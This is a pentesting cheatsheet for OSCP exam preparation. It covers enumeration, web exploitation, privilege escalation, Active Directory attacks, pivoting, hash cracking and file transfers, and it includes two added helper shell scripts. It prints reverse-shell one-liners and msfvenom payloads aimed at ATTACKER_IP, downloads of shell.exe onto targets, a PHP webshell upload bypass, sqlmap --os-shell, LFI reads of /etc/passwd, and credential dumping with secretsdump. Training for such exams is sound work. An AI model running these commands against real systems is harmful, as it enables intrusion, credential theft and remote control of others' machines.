# Enumeration
Enumeration is everything in the OSCP. Expect to spend 70-80% of your time here: scan all TCP ports, check UDP, and enumerate every service you find.
Nmap — Full Scan Strategy
nmap -p- --min-rate=1000 -T4 TARGET_IP -oN ports.txt
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET_IP
sudo nmap -sU --top-ports 200 --min-rate=1000 TARGET_IP
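The two-phase strategy above as a script. This is an added example, not part of the original cheatsheet: phase one is written in greppable format (-oG) so the open ports can be pulled out with extract_open_ports instead of by hand, and the file names ports_<target>.gnmap and detailed_<target> are my own choice.

```sh
#!/bin/sh
# Two-phase nmap strategy: fast full-port sweep, then default scripts and
# version detection on only the ports that were open. The gnmap parser is a
# separate function so the port list can be checked without running nmap.

# Print the open TCP ports found in an nmap greppable (-oG) file as "22,80,445".
# gnmap port entries look like "445/open/tcp//microsoft-ds///".
extract_open_ports() {
    grep -oE '[0-9]+/open/tcp' "$1" | cut -d/ -f1 | sort -un | paste -s -d ',' -
}

# Phase 1: all 65535 TCP ports, fast. -Pn: don't skip hosts that drop ICMP.
# Phase 2: -sC -sV on the open ports only, saved in all formats (-oA).
two_phase_scan() {
    target="$1"
    nmap -p- --min-rate=1000 -T4 -Pn "$target" -oG "ports_${target}.gnmap" >/dev/null
    ports=$(extract_open_ports "ports_${target}.gnmap")
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $target (firewalled? try -sU)" >&2
        return 1
    fi
    echo "[*] open TCP ports on $target: $ports"
    nmap -p "$ports" -sC -sV -Pn "$target" -oA "detailed_${target}"
}

# Usage: sh scan.sh TARGET_IP
if [ "$#" -eq 1 ]; then
    two_phase_scan "$1"
fi
```

Keep the gnmap file: when a service looks odd later, the raw port list is the fastest way to confirm you did not miss a high port.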
Web Enumeration
feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt,bak -t 50
whatweb http://TARGET && curl -s http://TARGET -I
nikto -h http://TARGET -C all
SMB Enumeration
smbclient -N -L //TARGET
enum4linux-ng -A TARGET
crackmapexec smb TARGET -u '' -p '' --shares
SNMP, LDAP, DNS
snmpwalk -v2c -c public TARGET 1.3.6.1.2.1
ldapsearch -H ldap://TARGET -x -b "DC=domain,DC=local" -s sub "(objectClass=user)" sAMAccountName
dig axfr @TARGET DOMAIN.LOCAL
# Web Exploitation
SQL injection, file upload bypass, command injection — the bread and butter of OSCP web boxes.
SQL Injection
sqlmap -u "http://TARGET/page?id=1" --batch --dbs
sqlmap -r request.txt --batch --level 5 --risk 3 --os-shell
File Upload Bypass
Set $ip and $port inside the shell before uploading. A double extension such as shell.php.jpg only executes when the server still maps the first extension to PHP (a common Apache AddHandler misconfiguration); if it does not, try .phtml, .phar or .php5, change the Content-Type to image/jpeg in Burp, or use a null byte (shell.php%00.jpg) on very old PHP.
cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
Command Injection
; whoami
If ; is filtered, try |, &&, a newline (%0a) or $(whoami) inside an argument. When nothing is reflected, prove blind injection with a delay (sleep 5) or a ping/DNS callback to ATTACKER_IP.
Local/Remote File Inclusion
curl "http://TARGET/page?file=../../../etc/passwd"
curl "http://TARGET/page?file=php://filter/convert.base64-encode/resource=config.php"
# Shells & Payloads
Reverse shells, bind shells, and payload generation — know these by heart for the exam.
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
Shell Upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo; fg
export TERM=xterm
The two commands run on different sides: after spawning the pty, press Ctrl-Z to background the shell, type stty raw -echo; fg in your own terminal, and then run export TERM=xterm inside the restored target shell. If full-screen programs misbehave, also set the size with stty rows and cols to match your terminal.
Msfvenom Payloads
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
# Linux Privilege Escalation
The OSCP loves Linux privesc. Check sudo rules, SUID binaries, capabilities, cron jobs, writable PATH entries and the kernel version. Exam targets normally have no outbound internet, so serve linpeas.sh from your own HTTP server rather than pulling it from GitHub as the first command does.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
find / -perm -4000 -type f 2>/dev/null
sudo -l
getcap -r / 2>/dev/null
cat /etc/crontab && ls -la /etc/cron*
find / -writable -type f 2>/dev/null | grep -v proc
uname -a && cat /etc/os-release
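Manual follow-ups for two of the findings listed above, writable PATH entries and cron job abuse. This is an added example, not part of the original cheatsheet; the file name privesc_checks.sh and the crontab used in the usage are my own, and the functions read a system crontab in /etc/crontab format (minute hour dom mon dow user command).

```sh
#!/bin/sh
# Why these two checks matter: a cron job (or sudo rule) that runs a bare
# command name resolves it through PATH, so a writable PATH directory lets you
# drop a binary of that name; a cron script you can write to is a root shell
# on the next run. Source this file, or run "sh privesc_checks.sh run".

# Print each directory in a PATH-style string that the current user can write
# to. An empty entry (as in "a::b" or a leading ":") means the current directory.
writable_path_dirs() {
    (
        IFS=:
        for d in $1; do
            [ -n "$d" ] || d=.
            if [ -w "$d" ]; then
                printf '%s\n' "$d"
            fi
        done
    )
}

# For every job in a system crontab, print "WRITABLE user path" when the
# command is an absolute path you can write to, and "RELATIVE user name" when
# it is a bare name that cron will look up on its PATH.
cron_targets() {
    while read -r f1 f2 f3 f4 f5 f6 f7 rest; do
        case "$f1" in
            ''|'#'*)        continue ;;              # blank line or comment
            [A-Za-z_]*=*)   continue ;;              # SHELL=, PATH=, MAILTO=
            @*)             user=$f2; prog=$f3 ;;    # @reboot user command
            *)              user=$f6; prog=$f7 ;;    # m h dom mon dow user command
        esac
        [ -n "$prog" ] || continue
        case "$prog" in
            /*) if [ -w "$prog" ]; then printf 'WRITABLE %s %s\n' "$user" "$prog"; fi ;;
            *)  printf 'RELATIVE %s %s\n' "$user" "$prog" ;;
        esac
    done < "$1"
}

# Writable directories on the PATH cron will use for RELATIVE commands: the
# crontab's own PATH= line, or cron's default of /usr/bin:/bin.
cron_path_writable() {
    cron_path=$(sed -n 's/^PATH=//p' "$1" | head -n 1)
    writable_path_dirs "${cron_path:-/usr/bin:/bin}"
}

if [ "${1:-}" = "run" ]; then
    echo "[*] writable dirs on your PATH:";   writable_path_dirs "$PATH"
    echo "[*] cron jobs worth a look:";       cron_targets /etc/crontab
    echo "[*] writable dirs on cron's PATH:"; cron_path_writable /etc/crontab
fi
```

Run the same checks against the files in /etc/cron.d and the scripts linked from /etc/cron.*; a RELATIVE hit is only useful when cron_path_writable (or the PATH of the user running the job) actually returns something.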
# Windows Privilege Escalation
Services, tokens, AlwaysInstallElevated, unquoted service paths, potatoes — the OSCP classics.
.\winPEASx64.exe
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"
whoami /priv
.\GodPotato.exe -cmd "cmd /c whoami"
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
AlwaysInstallElevated is only exploitable when the value is 1 under both HKLM and HKCU, so query the HKCU path the same way.
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows"
Look for service paths containing spaces that are not quoted. wmic is missing on recent Windows builds; there, list services with Get-CimInstance Win32_Service from PowerShell.
# Active Directory
AD is a major part of the OSCP after the 2023 update. Kerberoasting, AS-REP roasting, DCSync, and lateral movement.
bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip DC_IP
impacket-psexec domain.local/ADMIN:PASS@TARGET_IP
impacket-secretsdump domain.local/ADMIN:PASS@DC_IP
evil-winrm -i TARGET_IP -u USER -p PASS
crackmapexec smb SUBNET/24 -u USER -p PASS --shares
# Pivoting & Tunneling
Reach internal networks through compromised hosts. Chisel, SSH tunnels, ligolo — must-know for OSCP.
Chisel (Recommended)
./chisel server -p 8080 --reverse
./chisel client ATTACKER_IP:8080 R:socks
The server runs on the attacker, the client on the pivot host. R:socks opens a SOCKS5 proxy on the attacker at 127.0.0.1:1080; add socks5 127.0.0.1 1080 to /etc/proxychains4.conf. Only full TCP connects work through SOCKS, hence -sT and -Pn below (no SYN or UDP scans).
proxychains4 nmap -sT -Pn -p 445,3389,5985 INTERNAL_IP
SSH Tunneling
ssh -L 8080:INTERNAL_IP:80 user@PIVOT_IP
ssh -D 1080 user@PIVOT_IP
# Password Attacks
Cracking hashes and brute-forcing logins: hashcat and John are your best friends. Mode 13100 is Kerberos TGS-REP (Kerberoast) and 18200 is AS-REP, both RC4/etype 23. Drop --force unless hashcat refuses to start on your VM; it silences warnings that usually mean something is wrong.
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"
# File Transfers
Get tools onto the target and exfil data back. Multiple methods for different situations.
Linux Targets
python3 -m http.server 8000
wget http://ATTACKER_IP:8000/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
Windows Targets
certutil -urlcache -split -f http://ATTACKER_IP:8000/shell.exe C:\Windows\Temp\shell.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/shell.exe','C:\Windows\Temp\shell.exe')"
# OSCP Exam Tips
Strategy and mindset for the 23h45 exam. These tips come from hundreds of OSCP experiences.
❓ OSCP Frequently Asked Questions
Exam format: the OSCP exam is a 23h45 practical exam. It includes an Active Directory set worth 40 points and 3 standalone machines worth 20 points each. You need 70 points to pass, and a professional report submitted within 24 hours after the exam is mandatory.
Allowed tools: most common pentesting tools are allowed: nmap, Burp Suite, sqlmap, Metasploit (limited to one machine), linpeas, winpeas, crackmapexec, impacket, BloodHound. AI assistance is prohibited. Always check the official OffSec exam guide for the current policy.
Most important skill: enumeration. The community consensus is that if you're stuck, you haven't enumerated enough. Scan all 65535 TCP ports, check UDP, enumerate every service found, and read source code carefully. Expect to spend 70-80% of your time on recon.
Preparation time: most candidates need 3–6 months of dedicated practice on HackTheBox, TryHackMe, and OffSec PG Practice labs. Prior Linux administration and basic networking experience significantly reduces preparation time.
Kerberoasting: an Active Directory attack that requests service tickets for accounts with SPNs and cracks them offline. Use impacket-GetUserSPNs to extract the hashes and hashcat -m 13100 with rockyou.txt to crack them.
Privilege escalation, what to check first: Linux: sudo misconfigs, SUID binaries, cron job abuse, writable PATH entries. Windows: SeImpersonatePrivilege (GodPotato), unquoted service paths, AlwaysInstallElevated, DLL hijacking. Always run LinPEAS/WinPEAS first, then manually verify the findings.
Metasploit: allowed, but only against one machine for the entire exam (Meterpreter and post modules count towards that same machine). Choose wisely and save it for a machine where manual exploitation would be too time-consuming.
📚 Related Resources
- Nmap Cheatsheet — Complete nmap reference for recon and port scanning — essential for OSCP
- Full Pentesting Cheatsheet — 200+ commands for web, network, Active Directory, privesc and more
- How to Start Pentesting — OSCP methodology, learning path, and recommended labs
- Pentesting Glossary — Privilege escalation, lateral movement, Active Directory and 60+ terms defined